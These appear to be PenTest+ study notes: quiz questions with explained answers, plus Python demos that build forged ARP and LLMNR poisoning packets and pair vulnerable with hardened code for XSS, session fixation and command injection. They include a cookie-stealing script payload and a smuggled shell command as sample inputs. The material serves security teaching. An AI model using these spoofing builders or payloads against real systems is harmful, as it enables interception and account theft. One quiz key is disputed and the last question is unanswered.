CertPentest+


Netcat parameters

#The -l parameter starts Netcat in listen mode. The default mode is to act as a client. #The -L parameter starts Netcat in the Windows-only "listen harder" mode. This mode creates a persistent listener that starts listening again when the client disconnects. #The -e parameter specifies the program to execute when a connection is made.

A security tester is looking for custom scripts against uncommon services which they can't find in MetaSploit. Which of the following could they look at to possibly find what they need? a) ExploitDB b) MSTG c) OWASP d) OSSTMM

a) ExploitDB #While there are many repositories available, the tester can use the Exploit Database (Exploit-DB), a searchable archive of public exploits, proof-of-concept code, and the vulnerable software versions they target. #The OWASP MSTG (Mobile Security Testing Guide) is a manual for testing and reverse-engineering mobile apps; it is a methodology, not an exploit repository. #OWASP publishes testing guides and the Top 10, and the OSSTMM (Open Source Security Testing Methodology Manual) is a testing methodology; neither hosts exploit code.

A threat actor designed a malicious cross-site scripting attack to execute on the client's browser. What type of attack does this represent? a) Persistent attack b) Reflected attack c) DOM-based attack d) Directory traversal

c) DOM-based attack #The attack executes solely in the client's browser by abusing the web app's own client-side JavaScript; unlike persistent or reflected XSS, the malicious script is not processed by the server. #Directory traversal is not an XSS variant at all; it abuses path handling to read files outside the web root.

A client for a security assessment is worried about corruption of company information, as there are indications that data has been changed in some way, and wants to perform a health check. What is this called? a) Data exposure b) Risk gap c) Attack surface d) Data modification

d) Data modification #Data modification or corruption is when data has been altered in some way, which is a violation of integrity. #Exposing sensitive data occurs when someone or something exposes sensitive or personal data, which is a violation of confidentiality. #Until a patch is applied, the system is vulnerable and creates a risk gap, which is the time between when the vendor releases a patch, and the patch is applied. #Vulnerabilities exist in many different areas, called attack surfaces, which include software, hardware, networks, and users that can be exploited.

A threat actor has obtained a user's session ID (SID) and is impersonating the user. What type of session attack is this? a) Cross-site request forgery b) Server-side request forgery c) Session replay d) Session fixation

d) Session fixation #This represents a session fixation attack, which requires the user to authenticate with a session identifier the threat actor already knows; the attacker then presents that identifier to impersonate the user. #Session replay requires access to the authentication exchange itself so that the threat actor can intercept it and repeat it. NOTE on terminology: outside this question, reusing a session ID stolen from an already-authenticated session is usually called session hijacking (or replay); fixation specifically means the attacker supplied the ID before the victim logged in. See the "Session Replay Attack vs. Session Fixation Attack" entry below.

Most common API's

1) RESTful: API based on REST (Representational state transfer) 2) XML-RPC: Extensible Markup Language-Remote Procedure Call 3) SOAP: Simple Object Access Protocol

Censys vs. Shodan

Censys conducts more horizontal scans (each scanner potentially covering the entire IPv4 space), whereas Shodan appears to divide the IPv4 space among its scanners.

A security researcher is testing the disruption of a Wi-Fi signal by broadcasting on the same frequency as the target WAP. What is this called? a) Jamming b) Pineapple c) Deauthentication d) Slowloris

a) Jamming #Jamming is an attack that disrupts a Wi-Fi signal by broadcasting on the same frequency as the target WAP, and any signals that a wireless transceiver is attempting to send or receive will be blocked.

A security penetration tester wants to try exfiltrating data by synthesizing images into .wav files. Which tool should they use to do this? a) OpenStego b) Snow c) Coagula d) Ostinato

c) Coagula #Coagula is a tool used to synthesize an image into a .wav file. To achieve this, you'll need to download Coagula and Audacity, which are both free programs.

A penetration tester discovers a device during an engagement and needs to try conducting a Pixie attack or attempt to crack PMKID offline. Which tool should they use? a) Airmon-ng b) Spooftooph c) ScoutSuite d) Wifite2

d) Wifite2 #Wifite2 is a wireless auditing tool you can use to assess the WLAN. Wifite2 can launch a variety of attacks including Pixie attacks, PMKID cracking, and more. #ScoutSuite is an open-source tool written in Python that can be used to audit instances and policies created on multi-cloud platforms, such as AWS, Microsoft Azure, and Google Cloud.

SAN SET WiGLE Dirbuster

#A more useful field in a digital certificate from a reconnaissance perspective is the subject alternative name (SAN). SANs can identify specific subdomains that are covered by the certificate. #The Social Engineering Toolkit (SET) is a Python-based collection of tools that can be used when conducting a social engineering PenTest. You can download SET and install it on Linux, Unix, or Windows, or use it within Kali Linux. #WiGLE is a site dedicated to mapping and indexing access points. When WiGLE first became available in 2001, many wardrivers used the site to locate open access points to use the "Free Internet." #DirBuster is specifically geared towards website enumeration. There are numerous tools and techniques available to evaluate a website.

Gobuster vs. DirBuster

#Gobuster can discover subdomains, directories, and files by brute-forcing from a list of common names; this can reveal content that is not linked from anywhere. #DirBuster is a web application brute-force finder for directories and files that ships with nine wordlists, including default directories and common names given by developers. DirBuster is specifically geared towards website enumeration, one of numerous tools available to evaluate a website. NOTE: DirBuster is a Java GUI application, whereas Gobuster is a command-line tool written in Go.

Virtual environment attack types

#A class 1 virtual environment attack happens outside of the virtual machine and can affect the entire virtual environment. #A class 2 virtual environment attack directly affects the source, but does not necessarily originate from the source. #A class 3 virtual environment attack originates within the virtual machine, so the virtual machine is the attack source.

Difference between DNS/MAC/ARP spoofing:

1) Domain Name System (DNS) cache poisoning sends bogus records to a DNS resolver. When the victim requests an IP address, the DNS server will send the wrong IP address. 2) Address Resolution Protocol (ARP) spoofing transmits spoofed ARP messages out on the LAN. The spoofed messages falsely report a malicious actor's MAC address as being the victim's address. 3) MAC address spoofing will modify the MAC address on the malicious actor's NIC card so that it matches the MAC address on the victim's machine.
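The forged ARP reply described in item 2, built and decoded as bytes, with the trusted-table comparison a defender uses to catch it. This is an added example, not part of the original notes; the MAC and IP addresses are constructed and nothing is transmitted.

```python
"""ARP spoofing: what the forged 'is-at' reply looks like, and how to spot one.

Added example (not from the original page). Addresses are constructed for the
demo. Frames are built as bytes only; nothing is sent on the wire.
"""
import struct

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II + ARP reply meaning '<sender_ip> is-at <sender_mac>'.

    In a spoof, sender_mac is the attacker's NIC and sender_ip is the address
    being hijacked (typically the default gateway), unicast to the victim.
    """
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # Ethernet, IPv4, hlen, plen, oper
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Decodes an Ethernet/ARP frame into a dict; raises ValueError if it is not ARP."""
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet+ARP")
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol types")
    return {
        "eth_src": mac_str(frame[6:12]),
        "oper": oper,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
    }


def is_spoofed(frame, trusted):
    """True if an ARP reply claims a MAC for an IP that disagrees with a trusted table.

    `trusted` maps IP -> MAC, e.g. exported from DHCP leases or a static
    inventory; this is the comparison arpwatch-style tools and switch
    Dynamic ARP Inspection perform.
    """
    arp = parse_arp(frame)
    if arp["oper"] != ARP_REPLY:
        return False
    expected = trusted.get(arp["sender_ip"])
    return expected is not None and expected.lower() != arp["sender_mac"]


if __name__ == "__main__":
    # Constructed LAN: gateway 192.168.1.1 really owns 00:11:22:33:44:55.
    trusted = {"192.168.1.1": "00:11:22:33:44:55"}
    forged = build_arp_reply("de:ad:be:ef:00:01", "192.168.1.1",
                             "aa:bb:cc:dd:ee:01", "192.168.1.50")
    print(parse_arp(forged))
    print("spoofed:", is_spoofed(forged, trusted))
```

The victim's ARP cache takes the reply at face value because ARP has no authentication; the only practical defenses are a trusted binding table (as in `is_spoofed`) or switch-side inspection.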

Three categories of XSS attacks

1) Persistent (stored) - injected code is permanently stored on the web server and served to every visitor. For e.g.: injection of malicious script or links into a website's forums, comments, databases, or other stored data. 2) Reflected - the malicious script travels in a request to a legitimate web server, which echoes it back in the response to the victim's browser. For e.g.: a threat actor crafts a link or form that the victim submits to the legitimate server; the request carries the script and the server's response reflects it. 3) DOM-based - takes advantage of a web app's client-side JavaScript to execute the attack solely on the client. For e.g.: the threat actor does not send the malicious script to the server; instead the page's own JavaScript reads attacker-controlled data (such as the URL fragment) and writes it into the DOM unsafely.
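The reflected case from item 2, shown as the server-side code that makes it possible: one renderer echoes the query parameter raw, the other encodes it for the HTML-text context. This is an added example, not code from the original notes; it is written in Python rather than JavaScript so it runs stand-alone, and the template, URLs and payloads are constructed.

```python
"""Reflected XSS: the server echoes a request parameter into HTML.

Added example (not from the original page). The page template, URLs and
payloads are constructed for the demo.
"""
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed search-results template with a single insertion point in HTML text.
PAGE = "<html><body><p>Results for: {query}</p></body></html>"
TAG_RE = re.compile(r"<[A-Za-z/]")                          # start of an opening/closing tag
BASELINE_TAGS = len(TAG_RE.findall(PAGE.format(query="")))  # tags the template itself has


def query_param(url, name="q"):
    """Extracts one query-string parameter the way the server would see it."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(url):
    """Reflects the raw parameter: any markup in it becomes part of the page's DOM."""
    return PAGE.format(query=query_param(url))


def render_hardened(url):
    """Encodes for the HTML-text context, so '<', '>', '&' and quotes arrive as entities.

    Context matters: this is correct only between tags. Attribute values, URLs
    and JavaScript string contexts each need their own encoder.
    """
    return PAGE.format(query=html.escape(query_param(url), quote=True))


def injected_tag_count(page):
    """Tags beyond the template's own: > 0 means user input became markup."""
    return len(TAG_RE.findall(page)) - BASELINE_TAGS


if __name__ == "__main__":
    # Constructed attacker link: the victim opens it (phishing), the server
    # reflects the script, the victim's browser executes it in the site's origin.
    evil = "https://shop.example.test/search?q=<script>alert(document.cookie)</script>"
    print(render_vulnerable(evil), injected_tag_count(render_vulnerable(evil)))
    print(render_hardened(evil), injected_tag_count(render_hardened(evil)))
```

A persistent variant is the same bug with the parameter saved to a database and rendered later; the fix is identical: encode on output for the exact context, not on input.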

Session Replay Attack vs. Session Fixation Attack.

Both fixation and hijacking have ultimately the same goal - gaining access to a session. They only differ in how you achieve that. #Session hijacking is simply the act of stealing an existing, valid session cookie. Most commonly through sniffing network traffic (a MITM attack), but also through any other way a session ID may be leaked (XSS, logs, referrer headers). Replaying the stolen cookie is why this is also called a session replay attack. #Session fixation is similar, but inverted - a pre-defined session cookie is planted into the victim's browser. So after the victim logs into the website, they keep using the session cookie the attacker already knows, and thus the attacker-owned cookie is now authenticated and can be exploited. That requires a way to set the identifier in the victim's browser first (a crafted link carrying the ID in a URL parameter, a cookie set from a sibling subdomain, or brief access to the browser), but the principle is simple - there's no need to steal the data if it is under your control in the first place. #The defense against fixation is to issue a fresh session ID on every privilege change (especially login) and never to accept a session ID the server did not generate.
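The fixation scenario above and the quiz question on session identifiers earlier, played out against two login implementations: one that keeps whatever session ID arrived with the login request, and one that rotates it. This is an added example, not code from the original notes; the session store, the user table and the attacker-chosen identifier are constructed.

```python
"""Session fixation versus rotating the session ID at login.

Added example (not from the original page). The user table, the session store
and the attacker-chosen identifier are constructed for the demo.
"""
import secrets

# Constructed credential for the demo; real systems store salted password hashes.
USERS = {"alice": "correct horse battery staple"}


class SessionStore:
    """Minimal server-side session table: session_id -> attributes."""

    def __init__(self):
        self._sessions = {}

    def get_or_create(self, session_id):
        """Accepts a client-supplied ID it never issued: the behaviour fixation depends on."""
        if session_id is None:
            session_id = secrets.token_urlsafe(32)
        if session_id not in self._sessions:
            self._sessions[session_id] = {"user": None}
        return session_id

    def login_vulnerable(self, session_id, username, password):
        """Authenticates but keeps the pre-login ID, so a planted ID becomes privileged."""
        if USERS.get(username) != password:
            return None
        sid = self.get_or_create(session_id)
        self._sessions[sid]["user"] = username
        return sid

    def login_hardened(self, session_id, username, password):
        """Authenticates and rotates: the pre-login ID is destroyed, a fresh one issued."""
        if USERS.get(username) != password:
            return None
        self._sessions.pop(session_id, None)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = {"user": username}
        return new_sid

    def whoami(self, session_id):
        """Returns the authenticated user behind an ID, or None."""
        return self._sessions.get(session_id, {}).get("user")


def fixation_attack(login):
    """Plays the attack against one login method; returns what the attacker ends up with.

    1. The attacker picks an ID and plants it in the victim's browser (link, cookie, ...).
    2. The victim logs in while carrying that ID.
    3. The attacker presents the same ID; the return value is the user it now maps to.
    """
    store = SessionStore()
    planted = "attacker-chosen-id-0001"        # the value the attacker already knows
    store.get_or_create(planted)               # server accepted an ID it never issued
    login(store, planted, "alice", USERS["alice"])
    return store.whoami(planted)


if __name__ == "__main__":
    print("vulnerable:", fixation_attack(SessionStore.login_vulnerable))  # alice
    print("hardened:  ", fixation_attack(SessionStore.login_hardened))    # None
```

Note that `get_or_create` accepting unknown IDs is itself a weakness; the rotation in `login_hardened` is what makes the planted value worthless even when the store is that permissive.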

Why Powershell?

PowerShell can make it easier for PenTesters to automate the exploitation of the Registry, Active Directory (AD) objects, Group Policy, the Windows network stack, and more. NOTE: PowerShell is classed here as a shell and task-automation scripting language, not as a general-purpose interpreted programming language (IPL) like Python or Ruby.

Wifite2

Wifite2 is the wireless tool that can survey WLAN frequencies and automate a wireless attack through a series of command-line selections.

A penetration tester is using Netcat and does not want the command to perform DNS lookups for host names on the other end of the connection. What option will accomplish this? a) -n b) -p c) -z d) -l

a) -n #The penetration tester can use the -n option to tell Netcat not to perform DNS lookups for host names on the other end of the connection. #Penetration testers can use the -p option to specify the port that Netcat should start listening on in listen mode. In client mode, it specifies the source port. #Penetration testers can use the -z option to start Netcat in zero I/O mode, which instructs it to send a packet without a payload. #Penetration testers can use the -l option to start Netcat in listen mode. The default mode is to act as a client.

A PenTester developed a collapsed script and is now ready to inject it so it will download and execute a payload. What are some ways the PenTester can inject the script? (Select all that apply.) a) As a macro in Word document b) Via a USB implant c) Via a cookie d) Via a phishing email

a) As a macro in Word document b) Via a USB implant d) Via a phishing email #The PenTester can execute the collapsed script, which is also known as a one-liner, as a macro in a Word document that will execute when a user opens the document. #The PenTester can execute the collapsed script, which is also known as a one-liner, via a USB implant if the tester has physical access to the system. #The PenTester can execute the collapsed, or simplified, script via a phishing email which tricks the user into opening a document or clicking a link that executes it. NOTE: The PenTester cannot execute the collapsed script via a cookie as a cookie is a text file containing the session ID for a particular web session that a server gives to a client browser.

An administrator configured the system to lock out accounts for 30 minutes after 3 unsuccessful login attempts, but the system did not lock out accounts after three unsuccessful attempts and a threat actor took advantage of this failure to compromise a user's password. What does this represent? a) Business logic flaw b) Horizontal privilege escalation c) Vertical privilege escalation d) Session hijacking

a) Business logic flaw #This represents a business logic flaw, a vulnerability arising from implementation and design issues that lets an application be driven into unintended behavior while every individual request looks legitimate; here the lockout threshold was never enforced, so the threat actor could keep guessing. APIs are the services most commonly exploited through business logic flaws. #Horizontal privilege escalation is obtaining access to a different user account at the same privilege level as the one currently in use. NOTE: This approach has great potential for information gathering without raising suspicion, as irregular user activity is more likely to stay unnoticed than irregular admin activity. #Vertical privilege escalation is obtaining access to an account of higher privilege than the one currently held, to reach resources the regular user does not have permission for. NOTE: vertical PrivEsc also covers breaking out of a restricted shell. A restricted shell (e.g. rbash) is a Unix shell that limits some of the capabilities available to an interactive session or script; it is intended as an additional layer of security but is insufficient for safely running entirely untrusted software. #Session hijacking is taking over an existing authenticated session, which is not what happened here.

A penetration tester is using a framework to help manage available exploits and keep control of the devices the tester has targeted. What kind of framework is the tester using to accomplish this? a) C2 b) BeEF c) SQLi d) LDAP

a) C2 #The command and control (C2) frameworks manage available exploits, as well as help penetration testers keep control of the devices the tester has targeted. #SQLi is a SQL injection attack that allows the modification of any of the four basic functions of SQL querying by embedding code within the web application, causing it to execute your own set of queries using SQL. #The Lightweight Directory Access Protocol (LDAP) is a standard for networked devices on how to manage directory services.

A security tester has been using Shodan for several engagements but wants another source of reference similar to Shodan. Which of the following would best fit that? a) Censys b) OpenVAS c) Netcat d) ObfuscatedEmpire

a) Censys #When testing for vulnerabilities, one tool the team can use is Censys, an attack surface analyzer, similar to Shodan, to identify exposed systems. #A team can run a vulnerability scan using the Open Vulnerability Assessment Scanner. OpenVAS will list the vulnerabilities along with a risk rating that summarizes the overall state of the site that was tested.

A threat actor passed input to a web server which the system shell then executed. What type of attack did the threat actor execute? a) Command injection b) Code injection c) Data exfiltration d) IoT data corruption

a) Command injection #The threat actor executed a command injection attack in which malicious input supplied to the web server was passed to a system shell for execution, so shell metacharacters (such as ; | && and $()) in the input are interpreted as additional commands. #Code injection introduces malicious code into a vulnerable application that the application's own interpreter then executes (for example injected PHP or JavaScript); the distinction is the execution context, shell versus application runtime. #Data exfiltration is the unauthorized transfer of data out of the target environment, often over inconspicuous channels (DNS, HTTPS, cloud storage) to avoid detection. #IoT data corruption refers to faults in the information transmitted, stored, or otherwise managed by IoT devices.
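The command injection described above, as the vulnerable pattern next to two progressively safer ones. This is an added example, not code from the original notes; `echo` stands in for whatever command a web app might wrap (ping, nslookup, whois), the payload is constructed, and the vulnerable path assumes a POSIX /bin/sh.

```python
"""Command injection: shell-string concatenation versus argv lists plus validation.

Added example (not from the original page). `echo` stands in for the real
command a web app might wrap; the payload is constructed. The vulnerable
function needs a POSIX /bin/sh to misbehave as shown.
"""
import re
import subprocess

# RFC 1123-style hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen (so option-like input such as "-n" fails).
HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def lookup_vulnerable(host):
    """Builds one string for the shell: ';', '|', '$()' etc. inside `host` are interpreted."""
    result = subprocess.run("echo " + host, shell=True, capture_output=True, text=True)
    return result.stdout.splitlines()


def lookup_argv(host):
    """No shell: all of `host` is one argv element, so ';' is just a character.

    Still exposed to *argument* injection (a host of "-n" would be parsed as an
    option by the real command), which is why validation is added below.
    """
    result = subprocess.run(["echo", host], capture_output=True, text=True)
    return result.stdout.splitlines()


def lookup_hardened(host):
    """Allow-list validation first, then argv form; rejects anything that is not a hostname."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected input: {host!r}")
    return lookup_argv(host)


if __name__ == "__main__":
    payload = "example.com; echo INJECTED"       # constructed attacker input
    print("vulnerable:", lookup_vulnerable(payload))   # ['example.com', 'INJECTED']
    print("argv only: ", lookup_argv(payload))         # ['example.com; echo INJECTED']
    try:
        lookup_hardened(payload)
    except ValueError as exc:
        print("hardened:  ", exc)
```

The argv form alone closes the shell-metacharacter hole; the allow-list closes the remaining argument-injection hole and is the part most fixes forget.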

A security tester wants to launch an attack on a WPA2-Enterprise 802.11a or 802.11n network in a free, easy-to-use platform. Which of the following should they use? a) EAPHammer b) Fern c) Spooftooph d) SOHO

a) EAPHammer #EAPHammer is a Python-based toolkit for targeted evil twin attacks against WPA2-Enterprise 802.11a/n networks, automating the rogue access point, RADIUS back end and credential capture in an easy-to-use platform. #Fern WiFi Cracker runs on Linux and can recover WEP/WPS/WPA keys using a variety of methods; there is a free version with limited functionality and a paid Pro version. #Spooftooph is a Bluetooth spoofing tool, and SOHO (small office/home office) describes a network category, not a tool.

A penetration tester is using a tool that is brute-forcing a list of common names to find subdomains, directories, and files. What tool is the penetration tester using? a) Gobuster b) OWASP ZAP c) DirBuster d) w3af

a) Gobuster #Gobuster can discover subdomains, directories, and files by brute-forcing from a list of common names. This can provide information that was otherwise not available. NOTE: theHarvester and recon-ng can discover subdomains, employee names, email addresses, PGP key entries, open ports and service banners from public sources. #OWASP ZAP (Zed Attack Proxy) is a proxy that allows for both automated and manual testing and identification of vulnerabilities. #DirBuster is a web application brute-force finder for directories and files that comes with nine different lists, including default directories and common names given by developers. #w3af (Web Application Attack and Audit Framework) allows users to identify and exploit a large set of web-based vulnerabilities, such as SQL injection and cross-site scripting.

A malicious actor compromised a virtual machine host which allowed the malicious actor to gain control of the virtual environment. What type of attack does this represent? (Select all that apply.) a) Hyperjacking b) Class 1 c) VM escape d) Class 3

a) Hyperjacking b) Class 1 #This represents hyperjacking which is when a malicious actor takes control of the hypervisor that manages a virtual environment and then has all the required privileges to take full control of the environment. #VM escape is an attack where malware running in a VM is able to interact directly with the hypervisor or host kernel.

Security risks to web applications are common. Which does the OWASP deem as the most critical? (Select all that apply.) a) Insecure Data Transmission b) Lack of Error Handling c) User Input Sanitization d) Lack of Code Signing

a) Insecure Data Transmission b) Lack of Error Handling #Insecure data transmission (for example, sending credentials or session tokens without TLS) falls under A3:2017-Sensitive Data Exposure in the OWASP Top 10 2017 (A02:2021-Cryptographic Failures in the 2021 edition). #Lack of error handling falls under A6:2017-Security Misconfiguration, which includes verbose error messages that reveal stack traces and applications that do not respond gracefully to unexpected input and crash or fail open (A05:2021 in the 2021 edition). #User input sanitization is a control, not a risk; its absence leads to injection attacks, which A1:2017-Injection addresses. #Lack of code signing is not on the OWASP Top 10; code signing is the control that establishes a script or executable has not been tampered with (the 2021 edition touches on this under A08:2021-Software and Data Integrity Failures).

A PenTester is developing a cross-site scripting (XSS) attack. What scripting language will the PenTester most likely use? a) JavaScript b) Ruby c) Python d) PowerShell

a) JavaScript #The PenTester will most likely use JavaScript which developers use alongside HTML and CSS on the World Wide Web and PenTesters use it heavily in XSS attacks and PenTesting. #Ruby, like Python, is a general-purpose interpreted programming language that PenTesters can also use as a scripting language, but JavaScript is most popular. #Python is a popular language for implementing all kinds of development projects, including automation tools and security tools, as well as malicious scripts. #PowerShell can make it easier for PenTesters to automate the process of exploiting the Registry, Active Directory objects, Group Policy, the Windows network stack, and more.

A student is studying cyber security and reads about a tool called Responder. The student sets it up on their home network to test on devices that they own. Which protocols should they filter during packet captures to see what is happening? (Select all that apply.) a) LLMNR b) NBT-NS c) SSH d) VNC

a) LLMNR b) NBT-NS #Responder is a man-in-the-middle tool that exploits Windows name-resolution fallback: when DNS cannot resolve a name, the host multicasts an LLMNR (Link-Local Multicast Name Resolution, UDP/5355) query and then broadcasts an NBT-NS (NetBIOS Name Service, UDP/137) query, and Responder answers both with the attacker's IP as the name record, then collects the NTLM authentication the victim sends to that address. #To disable LLMNR, set the DWORD EnableMulticast to 0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient (the registry equivalent of the Group Policy setting "Turn off multicast name resolution"); NBT-NS is disabled per adapter in the WINS tab of the IPv4 advanced TCP/IP settings. #SSH and VNC play no part in name-resolution poisoning, so filtering on them would show nothing relevant.
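The LLMNR exchange Responder abuses, built and decoded as bytes: the query a Windows host multicasts after DNS fails, and the poisoned answer that points the name at the attacker. This is an added example, not code from the original notes or from Responder; the transaction ID, hostname and attacker address are constructed, and nothing is sent on the network.

```python
"""LLMNR poisoning: the query a Windows host multicasts, and the poisoned answer.

Added example (not from the original page). Transaction ID, hostname and the
attacker address are constructed; packets are built and parsed as bytes only.
LLMNR reuses the DNS message format on UDP/5355 (multicast 224.0.0.252).
"""
import struct

LLMNR_PORT = 5355
LLMNR_MCAST = "224.0.0.252"
QTYPE_A, QCLASS_IN = 1, 1
FLAG_QR = 0x8000                      # set in responses only


def encode_name(name):
    """DNS-style label encoding: 'fileshare' -> b'\\x09fileshare\\x00'."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split("."))
    return out + b"\x00"


def decode_name(msg, offset):
    """Reads labels at offset; returns (name, offset after the name). LLMNR does not compress names."""
    labels = []
    while True:
        length = msg[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length


def build_query(txid, name, qtype=QTYPE_A):
    """What a client sends when DNS has no answer for a (often mistyped) name."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)   # id, flags, qd, an, ns, ar
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_query(msg):
    """Returns (txid, name, qtype) of a single-question query."""
    txid, flags, qdcount = struct.unpack("!HHH", msg[:6])
    if flags & FLAG_QR or qdcount != 1:
        raise ValueError("not a single-question LLMNR query")
    name, off = decode_name(msg, 12)
    qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
    return txid, name, qtype


def build_poisoned_response(query, attacker_ip, ttl=30):
    """The poisoner's move: echo the question and answer it with the attacker's IP."""
    txid, name, qtype = parse_query(query)
    if qtype != QTYPE_A:
        raise ValueError("only A queries handled here")
    header = struct.pack("!HHHHHH", txid, FLAG_QR, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)
    rdata = bytes(int(o) for o in attacker_ip.split("."))
    answer = encode_name(name) + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_response(msg):
    """Returns (txid, name, ip) from a single-answer A response: what the victim's resolver trusts."""
    txid, flags, qdcount, ancount = struct.unpack("!HHHH", msg[:8])
    if not flags & FLAG_QR or ancount < 1:
        raise ValueError("not an LLMNR response carrying an answer")
    off = 12
    for _ in range(qdcount):                  # skip the echoed question section
        _, off = decode_name(msg, off)
        off += 4
    name, off = decode_name(msg, off)
    rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
    off += 10
    if rtype != QTYPE_A or rdlen != 4:
        raise ValueError("not an A record")
    return txid, name, ".".join(str(b) for b in msg[off:off + 4])


if __name__ == "__main__":
    query = build_query(0x1234, "fileshare")            # constructed victim query
    response = build_poisoned_response(query, "10.0.0.66")  # constructed attacker host
    print(parse_query(query))
    print(parse_response(response))
```

The victim only checks that the transaction ID and question match, so whoever answers first wins; that is why the real fix is turning LLMNR off rather than filtering responses.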

A company is using enterprise mobility management software (EMM) to make sure that all the devices employees bring and connect to the corporate network meet established security policies. What functions will the EMM software manage? (Select all that apply.) a) Locking and wiping employee devices b) Preventing employees from installing apps c) Reporting personal data usage back to the employer d) Pushing out updates to devices

a) Locking and wiping employee devices b) Preventing employees from installing apps d) Pushing out updates to devices #The EMM software will allow locking and wiping of employee devices through mobile device management (MDM), which sets device policies for authentication, feature use, and connectivity. #The EMM software will prevent employees from installing apps through mobile application management (MAM), which sets policies for apps and can prevent the installation of unauthorized apps. #The EMM software will push out updates to devices through mobile application management (MAM), which sets policies for apps that can automatically push out updates. NOTE: Enterprise mobility management (EMM) software typically does not report employee personal data usage back to the employer; it may report data usage within the enterprise-managed side of the device.

A vulnerability has just gone through the mitigation phase of the vulnerability lifecycle. What is the next phase? a) Manage b) Document c) Discover d) Coordinate

a) Manage #Manage is when the patch has been released. It's now up to each organization to take the next step and apply the patch in order to remediate or mitigate the vulnerability. #Document is the final phase: the vulnerability has been tested and everyone involved takes a moment to document what has been done. In addition, it's best to reflect on lessons learned. #Discover is the first phase, finding a potential vulnerability that can be exploited. It's important to recognize that a vulnerability exists in order to defend against a possible attack, now or in the future. #Coordinate is the phase after discovery, where both the vulnerability and the potential to exploit it are known and disclosure to the vendor is arranged. Order of phases: Discover -> Coordinate -> Manage -> Document.

A team is conducting a physical assessment and uses a simple mechanism such as Styrofoam to bypass a certain control. Which control are they likely bypassing? a) Motion sensor b) Fences c) Security badges d) Locks

a) Motion sensor #The team can attempt to block the motion detector by using a piece of cardboard or Styrofoam over the sensor. #Many buildings have perimeter security, such as natural barriers or fences, to deter someone from simply entering the property. Cardboard would not be as helpful with this. #A radio-frequency identification (RFID) badge system can be used for physical security. These badges hold an individual's authorization credentials and use a proximity reader that reads data when in range. #Lock picking uses specialized tools to manipulate the components of a lock in order to gain access to a restricted area.

A penetration tester is analyzing entry to a network utilizing 802.1X authentication. Which of the following is NOT one of the three main components of this setup? a) Organizational Units b) Supplicant c) Authenticator d) AS

a) Organizational Units #Organizational Units are used with a domain to group similar objects such as the users, groups, computers, and other OUs and minimize the number of domains. #The Supplicant (or Wi-Fi client) is the first entity in 802.1X authentication. In a corporate WLAN, clients generally must authenticate prior to gaining access to the network using the 802.1X authentication protocol. #The Authenticator (or WAP) is the second entity in 802.1X authentication. Once authenticated, a virtual port is created on the access point and the client can then access network resources. #The Authentication Server (AS) is the last entity in 802.1X authentication. It is generally a RADIUS server that provides the authentication.

A script is any computer program that automates the execution of tasks for a particular runtime environment. Which of the following represent elements of a well-written script? (Select all that apply.) a) Parameters b) Branching and looping c) Unexpected checks d) Unit tests

a) Parameters b) Branching and looping d) Unit tests #An element of a well-written script is parameters that the script takes as input data and the system passes to the script as arguments. #An element of a well-written script is branching and looping statements that can alter the flow of execution based on conditions. #An element of a well-written script is unit tests to ensure that the script returns the expected outputs, given the expected inputs. NOTE: Unexpected checks is not an element of a well-written script but scripts should have validation and error handlers to check inputs and ensure robust execution.

A security professional is looking for an organization's code that might have been posted publicly by developers. Which of the following sources is least likely to contain accidental posts by a company's developers? a) Reddit b) Github c) Bitbucket d) CloudForge

a) Reddit #Reddit is less likely to contain code from developers, though it is possible it could exist on here. The other three options are specifically geared towards shared code repositories. #Github enables teams to work together, regardless of their location, is free to basic users, and has reasonable costs for teams and enterprise users. #Bitbucket allows inline comments, a secured workflow, and free to small teams, fee-based for larger groups. #CloudForge offers bug and issue tracking, discussion forums, and document management. You can get a free trial for 30 days, after which there is a nominal fee.

A security professional is looking for interesting targets on a public-facing web server. When reviewing server files by the professional, what areas should not be crawled/searched? a) Robots b) Subject alternative name c) Revocation list d) Secret

